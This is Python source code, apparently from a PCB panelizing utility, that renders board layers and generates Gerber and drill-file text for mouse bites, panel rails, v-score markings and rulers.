print('\n')
if board_name is None:
board_name = pcb_path
text = 'Reading PCB \"{}\"'.format(board_name)
log_text(progressbar, text, progressbar_value)
pcb = PCB.from_directory(pcb_path, verbose=True)
if pcb is None:
return
print('\n')
progressbar_value = 0.25
for layer in pcb.layers:
text = 'Found layer \"{}\"'.format(layer.name())
log_text(progressbar, text, progressbar_value)
print('\n')
bounds = pcb.board_bounds
get_outline = True
clip_to_outline = False
print_outline = False
size = bounds_to_size(bounds)
resolution = size_to_resolution(size, PIXELS_PER_MM, PIXELS_SIZE_MIN, PIXELS_SIZE_MAX)
ctx = GerberCairoContext(resolution)
if get_outline:
file_path = os.path.join(data_path, 'edge_cuts_mask')
layer = pcb.edge_cuts_layer
if layer is not None:
text = 'Rendering mask for layer \"{}\"'.format(layer.name())
progressbar_value = 0.5
log_text(progressbar, text, progressbar_value)
outline_str = ctx.get_outline_mask(layer, file_path, bounds=bounds, verbose=False)
if print_outline and outline_str is not None:
print('\n{}'.format(outline_str))
layers = pcb.layers
progressbar_advance = 0.5 / len(layers)
for layer in pcb.layers:
file_path = os.path.join(data_path, '{}'.format(layer.name()))
text = 'Rendering layer \"{}\"'.format(layer.name())
log_text(progressbar, text, progressbar_value)
progressbar_value += progressbar_advance
ctx.render_clipped_layer(layer, clip_to_outline, file_path, theme.THEMES['Mask'], bounds=bounds,
background=False, verbose=False)
log_text(progressbar, 'Done', 1.0)
print('\n')
def generate_float46(value):
data = ''
float_full_str = '{:0.6f}'.format(value)
segments = float_full_str.split('.')
for s in segments:
data += '{}'.format(s)
return data
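# Worked example (added note): generate_float46(3.0476) -> '3047600' and
# generate_float46(-0.4524) -> '-0452400', i.e. the decimal point is dropped
# from a fixed 6-decimal representation, matching the FSLAX46Y46 format used below.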
# converts from:
# X14410952Y3047620D02*
# to code like:
# data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.4110), generate_float46(oy+3.0476))
# suitable for generate_*_text_data functions
def convert_grbl_to_code(path, file_name, offset_x, offset_y):
file = load_file(path, file_name)
segments = file.split("\n")
for s in segments:
s = s.replace('X', ' ').replace('Y', ' ').replace('D', ' ')
parts = s.split(" ")
#print('s: {}'.format(s))
#print('parts: {}'.format(parts))
x = parts[1]
x = insert_str(x, '.', len(x) - 6)
x = str_to_float(x) - offset_x
x = '{:+0.4f}'.format(x)
y = parts[2]
y = insert_str(y, '.', len(y) - 6)
y = str_to_float(y) - offset_y
y = '{:+0.4f}'.format(y)
d = parts[3]
print(' data += \'X{{}}Y{{}}D{}\\n\'.format(generate_float46(ox{}), generate_float46(oy{}))'.format(d, x, y))
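# Hedged usage sketch (not in the original file): convert_grbl_to_code is a
# developer helper that prints ready-to-paste lines; something like
#   convert_grbl_to_code(cwd, 'ruler.gm1', offset_x=14.0, offset_y=3.0)
# would echo "data += 'X{}Y{}D02*..." lines for each coordinate in the file.
# The path, file name and offsets here are placeholders, and load_file /
# insert_str / str_to_float are assumed to come from the Utilities import above.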
def generate_mouse_bite_gm1_data(origin, size, arc, close):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Profile,NP*%\n'
data += '%TF.ProjectId,hm-PanelMouseBite,0,0*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,Profile*%\n'
data += '%ADD10C,0.100000*%\n'
data += '%TD*%\n'
data += 'G04 APERTURE END LIST*\n'
data += 'D10*\n\n'
data += 'G04 mouse bite left bottom arc*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(min_y))
data += 'G75*\n'
data += 'G03*\n'
data += 'X{}Y{}I{}J{}D01*\n\n'.format(generate_float46(min_x+arc), generate_float46(min_y+arc),
generate_float46(0), generate_float46(arc))
data += 'G04 mouse bite left connect arcs line*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x+arc), generate_float46(min_y+arc))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(min_x+arc), generate_float46(max_y-arc))
data += 'G04 mouse bite left top arc*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x+arc), generate_float46(max_y-arc))
data += 'G75*\n'
data += 'G03*\n'
data += 'X{}Y{}I{}J{}D01*\n\n'.format(generate_float46(min_x), generate_float46(max_y),
generate_float46(-arc), generate_float46(0))
data += 'G04 mouse bite right bottom arc*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(max_x), generate_float46(min_y))
data += 'G75*\n'
data += 'G02*\n'
data += 'X{}Y{}I{}J{}D01*\n\n'.format(generate_float46(max_x-arc), generate_float46(min_y+arc),
generate_float46(0), generate_float46(arc))
data += 'G04 mouse bite right connect arcs line*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(max_x-arc), generate_float46(min_y+arc))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(max_x-arc), generate_float46(max_y-arc))
data += 'G04 mouse bite right top arc*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(max_x-arc), generate_float46(max_y-arc))
data += 'G75*\n'
data += 'G02*\n'
data += 'X{}Y{}I{}J{}D01*\n\n'.format(generate_float46(max_x), generate_float46(max_y),
generate_float46(arc), generate_float46(0))
if close:
data += 'G04 mouse bite closing gap at top/bottom*\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(min_y))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(max_x), generate_float46(min_y))
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(max_y))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(max_x), generate_float46(max_y))
data += 'M02*\n'
return data
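# Hedged usage sketch (assumption, not in the original file): the returned
# string is a complete Gerber (.gm1) document, so one way to inspect it is
#   with open('mouse_bite_preview.gm1', 'w') as f:
#       f.write(generate_mouse_bite_gm1_data(origin=(0.0, 0.0), size=(5.0, 2.0),
#                                            arc=0.5, close=True))
# with origin/size/arc given in millimetres (MOMM) per the header emitted above.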
def generate_rail_gm1_data(origin, size, panels, gap, vcut):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
width = size[0]
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Profile,NP*%\n'
data += '%TF.ProjectId,hm-PanelRail,0,0*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,Profile*%\n'
data += '%ADD10C,0.100000*%\n'
data += '%TD*%\n'
data += 'G04 APERTURE END LIST*\n'
data += 'D10*\n\n'
data += 'G01*\n'
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(min_y))
data += 'X{}Y{}D01*\n'.format(generate_float46(max_x), generate_float46(min_y))
data += 'X{}Y{}D02*\n'.format(generate_float46(max_x), generate_float46(min_y))
data += 'X{}Y{}D01*\n'.format(generate_float46(max_x), generate_float46(max_y))
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(max_y))
data += 'X{}Y{}D01*\n'.format(generate_float46(max_x), generate_float46(max_y))
data += 'X{}Y{}D02*\n'.format(generate_float46(min_x), generate_float46(max_y))
data += 'X{}Y{}D01*\n\n'.format(generate_float46(min_x), generate_float46(min_y))
# if vcut and panels > 1:
# available = width - (float(panels-1) * gap)
# section = available / float(panels)
# x = min_x - (gap/2.0)
# for i in range(0, panels-1):
# x += section + gap
# data += 'X{}Y{}D02*\n'.format(generate_float46(x), generate_float46(max_y))
# data += 'X{}Y{}D01*\n'.format(generate_float46(x), generate_float46(min_y))
# data += '\n\n'
data += 'M02*\n'
return data
def generate_jlcjlcjlcjlc_text_data(origin, aperture):
ox = origin[0]
oy = origin[1]
data = ''
data += 'D{}*\n'.format(aperture)
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.4110), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.4110), generate_float46(oy-0.1667))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.3633), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.2681), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1252), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0300), generate_float46(oy-0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+1.3633), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8871), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8871), generate_float46(oy+0.5476))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+2.2681), generate_float46(oy-0.3571))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.2205), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.0776), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.9824), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.8395), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.7443), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.6967), generate_float46(oy-0.2143))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.6490), generate_float46(oy-0.0238))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.6490), generate_float46(oy+0.1190))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.6967), generate_float46(oy+0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.7443), generate_float46(oy+0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.8395), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+1.9824), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.0776), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.2205), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.2681), generate_float46(oy+0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+2.9824), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.9824), generate_float46(oy-0.1667))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.9348), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.8395), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.6967), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+2.6014), generate_float46(oy-0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+3.9348), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+3.4586), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+3.4586), generate_float46(oy+0.5476))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+4.8395), generate_float46(oy-0.3571))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.7919), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.6490), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.5538), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.4110), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.3157), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.2681), generate_float46(oy-0.2143))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.2205), generate_float46(oy-0.0238))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.2205), generate_float46(oy+0.1190))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.2681), generate_float46(oy+0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.3157), generate_float46(oy+0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.4110), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.5538), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.6490), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.7919), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+4.8395), generate_float46(oy+0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+5.5538), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.5538), generate_float46(oy-0.1667))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.5062), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.4110), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.2681), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+5.1729), generate_float46(oy-0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+6.5062), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.0300), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.0300), generate_float46(oy+0.5476))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+7.4110), generate_float46(oy-0.3571))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.3633), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.2205), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.1252), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.9824), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.8871), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.8395), generate_float46(oy-0.2143))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.7919), generate_float46(oy-0.0238))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.7919), generate_float46(oy+0.1190))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.8395), generate_float46(oy+0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.8871), generate_float46(oy+0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+6.9824), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.1252), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.2205), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.3633), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.4110), generate_float46(oy+0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+8.1252), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+8.1252), generate_float46(oy-0.1667))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+8.0776), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.9824), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.8395), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+7.7443), generate_float46(oy-0.4524))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+9.0776), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+8.6014), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+8.6014), generate_float46(oy+0.5476))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+9.9824), generate_float46(oy-0.3571))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.9348), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.7919), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.6967), generate_float46(oy-0.4524))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.5538), generate_float46(oy-0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.4586), generate_float46(oy-0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.4110), generate_float46(oy-0.2143))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.3633), generate_float46(oy-0.0238))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.3633), generate_float46(oy+0.1190))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.4110), generate_float46(oy+0.3095))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.4586), generate_float46(oy+0.4048))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.5538), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.6967), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.7919), generate_float46(oy+0.5476))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.9348), generate_float46(oy+0.5000))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+9.9824), generate_float46(oy+0.4524))
data += '\n'
return data
def generate_vscore_text_data(origin, aperture):
ox = origin[0]
oy = origin[1]
data = ''
data += 'D{}*\n'.format(aperture)
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+0.8500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+1.0833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+1.3167))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.5536), generate_float46(oy+1.5500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.5536), generate_float46(oy+2.0833))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.7679), generate_float46(oy+2.8167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8036), generate_float46(oy+2.7833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+2.6833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+2.6167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8036), generate_float46(oy+2.5167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.7321), generate_float46(oy+2.4500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.6607), generate_float46(oy+2.4167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.5179), generate_float46(oy+2.3833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.4107), generate_float46(oy+2.3833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.2679), generate_float46(oy+2.4167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1964), generate_float46(oy+2.4500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1250), generate_float46(oy+2.5167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+2.6167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+2.6833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1250), generate_float46(oy+2.7833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.1607), generate_float46(oy+2.8167))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+3.1167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.6964), generate_float46(oy+3.1167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.7679), generate_float46(oy+3.1500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8036), generate_float46(oy+3.1833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+3.2500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+3.3833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.8036), generate_float46(oy+3.4500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.7679), generate_float46(oy+3.4833))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.6964), generate_float46(oy+3.5167))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+3.5167))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+3.7500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+4.1500))
data += 'X{}Y{}D02*\n'.format(generate_float46(ox+0.8393), generate_float46(oy+3.9500))
data += 'X{}Y{}D01*\n'.format(generate_float46(ox+0.0893), generate_float46(oy+3.9500))
data += '\n'
return data
def generate_rail_gto_data(origin, size, panels, gap, vcut, jlc):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
width = size[0]
height = size[1]
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Legend,Top*%\n'
data += '%TF.FilePolarity,Positive*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,Profile*%\n'
data += '%ADD10C,0.150000*%\n'
data += '%ADD11C,0.125000*%\n'
data += 'G04 APERTURE END LIST*\n\n'
if jlc:
data += generate_jlcjlcjlcjlc_text_data(origin=(8.0, height/2.0), aperture=10)
if vcut and panels > 1:
data += 'D10*\n'
available = width - (float(panels-1) * gap)
section = available / float(panels)
x = min_x - (gap/2.0)
for i in range(0, int(panels-1)):
x += section + gap
data += 'X{}Y{}D02*\n'.format(generate_float46(x), generate_float46(max_y))
data += 'X{}Y{}D01*\n'.format(generate_float46(x), generate_float46(min_y))
data += generate_vscore_text_data(origin=(x+0.5, 0.0), aperture=11)
data += 'M02*\n'
return data
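# The v-cut placement above splits the usable width evenly between panels and
# draws one vertical score line through the middle of every gap. A minimal
# standalone sketch of that arithmetic; the helper name and the sample numbers
# are illustrative, not part of this module:
def _vcut_positions(min_x, width, panels, gap):
    available = width - (panels - 1) * gap   # width left once the gaps are removed
    section = available / panels             # width of a single panel
    x = min_x - gap / 2.0
    positions = []
    for _ in range(panels - 1):
        x += section + gap
        positions.append(x)
    return positions

# e.g. three 50 mm panels with 2 mm gaps starting at x=0:
# _vcut_positions(0.0, 154.0, 3, 2.0) -> [51.0, 103.0]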
def generate_rail_gbo_data(origin, size):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
width = size[0]
height = size[1]
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Legend,Top*%\n'
data += '%TF.FilePolarity,Positive*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,Profile*%\n'
data += '%ADD10C,0.100000*%\n'
data += 'G04 APERTURE END LIST*\n\n'
data += 'D10*\n'
margin = 0.5
y_major = (0.5 * height) - margin
y_minor = (0.4 * height) - margin
y_tick = (0.3 * height) - margin
# metric ruler
for x in range(0, int(width)+1):
y = y_tick
if (x % 5) == 0:
y = y_minor
if (x % 10) == 0:
y = y_major
pos = width - x
data += 'X{}Y{}D02*\n'.format(generate_float46(pos), generate_float46(min_y+y))
data += 'X{}Y{}D01*\n'.format(generate_float46(pos), generate_float46(min_y))
# imperial ruler (mm to inch)
width_imp = (width / 25.4) * 16.0
for x in range(0, int(width_imp)):
y = y_tick
if (x % 8) == 0:
y = y_minor
if (x % 16) == 0:
y = y_major
pos = (x / 16.0) * 25.4  # x-th 1/16 inch tick converted to mm
data += 'X{}Y{}D02*\n'.format(generate_float46(pos), generate_float46(max_y))
data += 'X{}Y{}D01*\n'.format(generate_float46(pos), generate_float46(max_y-y))
data += 'M02*\n'
return data
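# The two loops above draw rulers on the rail: one tick per millimetre rising
# from the bottom edge (medium tick every 5 mm, long tick every 10 mm) and one
# tick per 1/16 inch hanging from the top edge (medium every 1/2 inch, long
# every inch). A standalone sketch of the tick-length selection; the helper
# name is illustrative, not part of this module:
def _tick_length(index, minor_every, major_every, small, medium, large):
    if index % major_every == 0:
        return large
    if index % minor_every == 0:
        return medium
    return small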
def generate_rail_gtl_data(origin, size):
min_x = origin[0]
min_y = origin[1]
width = size[0]
height = size[1]
max_x = min_x+width
max_y = min_y+height
offset = 5.0
x = min_x + offset
y = min_y + (height / 2.0)
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Copper,L1,Top*%\n'
data += '%TF.FilePolarity,Positive*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,SMDPad,CuDef*%\n'
data += '%ADD10C,1.000000*%\n'
data += '%TD*%\n'
data += 'G04 APERTURE END LIST*\n'
data += 'D10*\n\n'
data += 'G01*\n'
data += 'X{}Y{}D03*\n'.format(generate_float46(x), generate_float46(y))
gap = 10.0
while x < (max_x-gap-offset):
x += gap
data += 'X{}Y{}D03*\n'.format(generate_float46(x), generate_float46(y))
data += 'M02*\n'
return data
def generate_rail_gts_data(origin, size):
min_x = origin[0]
min_y = origin[1]
width = size[0]
height = size[1]
max_x = min_x+width
max_y = min_y+height
offset = 5.0
x = min_x + offset
y = min_y + (height / 2.0)
data = ''
data += '%TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '%TF.SameCoordinates,Original*%\n'
data += '%TF.FileFunction,Soldermask,Top*%\n'
data += '%TF.FilePolarity,Negative*%\n'
data += '%FSLAX46Y46*%\n'
data += 'G04 Gerber Fmt 4.6, Leading zero omitted, Abs format (unit mm)*\n'
data += 'G04 Created by {}*\n\n'.format(APP_STR)
data += '%MOMM*%\n'
data += '%LPD*%\n\n'
data += 'G04 APERTURE LIST*\n'
data += '%TA.AperFunction,SMDPad,CuDef*%\n'
data += '%ADD10C,2.000000*%\n'
data += 'G04 APERTURE END LIST*\n'
data += 'D10*\n\n'
data += 'G01*\n'
data += 'X{}Y{}D03*\n'.format(generate_float46(x), generate_float46(y))
gap = 10.0
while x < (max_x-gap-offset):
x += gap
data += 'X{}Y{}D03*\n'.format(generate_float46(x), generate_float46(y))
data += 'M02*\n'
return data
def generate_mouse_bite_drl_data(origin, size, radius, space):
min_x = origin[0]
min_y = origin[1]
max_x = min_x+size[0]
max_y = min_y+size[1]
width = size[0]
height = size[1]
diameter = 2.0*radius
data = ''
data += 'M48\n'
data += '; DRILL file {{{}}}\n'.format(APP_STR)
data += '; FORMAT={-:-/ absolute / metric / decimal}\n'
data += '; #@! TF.GenerationSoftware,{},{},{}*%\n'.format(VENDOR_NAME, APP_NAME, VERSION_STR)
data += '; #@! TF.FileFunction,NonPlated,1,2,NPTH\n'
data += 'FMAT,2\n'
data += 'METRIC\n\n'
data += '; #@! TA.AperFunction,NonPlated,NPTH,ComponentDrill\n'
data += 'T1C{:0.3f}\n'.format(diameter)
data += '%\n'
data += 'G90\n'
data += 'G05\n'
data += 'T1\n'
unit = (radius + space + radius)
count = int(width / unit) - 2
cx = min_x + (width / 2.0)
data += 'X{}Y{}\n'.format(generate_decfloat3(cx), generate_decfloat3(min_y))
data += 'X{}Y{}\n'.format(generate_decfloat3(cx), generate_decfloat3(max_y))
x = 0
for i in range(0, count):
x += unit
data += 'X{}Y{}\n'.format(generate_decfloat3(cx+x), generate_decfloat3(min_y))
data += 'X{}Y{}\n'.format(generate_decfloat3(cx-x), generate_decfloat3(min_y))
data += 'X{}Y{}\n'.format(generate_decfloat3(cx+x), generate_decfloat3(max_y))
data += 'X{}Y{}\n'.format(generate_decfloat3(cx-x), generate_decfloat3(max_y))
data += 'M30\n'
return data
